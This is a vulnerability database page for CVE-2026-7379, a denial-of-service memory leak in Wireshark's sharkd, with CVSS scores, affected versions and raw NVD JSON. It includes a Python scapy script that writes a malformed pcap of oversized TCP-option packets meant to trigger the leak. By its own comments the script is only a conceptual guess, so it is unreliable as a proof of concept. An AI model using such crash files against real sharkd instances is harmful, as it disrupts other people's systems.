Security Vulnerability Report
中文
CVE-2026-7379 CVSS 5.5 MEDIUM

CVE-2026-7379

Published: 2026-04-30 06:16:17
Last Modified: 2026-05-01 18:41:42

Description

Memory leak in sharkd 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
Wireshark 4.4.0 - 4.4.14
Wireshark 4.6.0 - 4.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Conceptual PoC for CVE-2026-7379 (Memory Leak in sharkd) # This script creates a malformed pcap file that may trigger the memory leak. from scapy.all import * import sys # Create a packet structure targeting the vulnerable dissector logic # Real-world exploit would require specific protocol fields based on the advisory. # Here we simulate a payload that forces repeated allocation. malicious_payload = b"\x41" * 1024 # Filler data pkt = Ether()/IP(dst="192.168.1.1")/TCP(dport=80, options=[(19, malicious_payload)]) # Generate multiple packets to exacerbate the leak packets = [pkt] * 1000 try: wrpcap("cve_2026_7379_poc.pcap", packets) print("[+] Payload file 'cve_2026_7379_poc.pcap' generated successfully.") print("[*] Usage: Load this file in sharkd (e.g., 'sharkd -r cve_2026_7379_poc.pcap') and monitor memory usage.") except Exception as e: print(f"[-] Error generating pcap: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7379", "sourceIdentifier": "[email protected]", "published": "2026-04-30T06:16:17.333", "lastModified": "2026-05-01T18:41:41.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory leak in sharkd 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21214", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-47.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}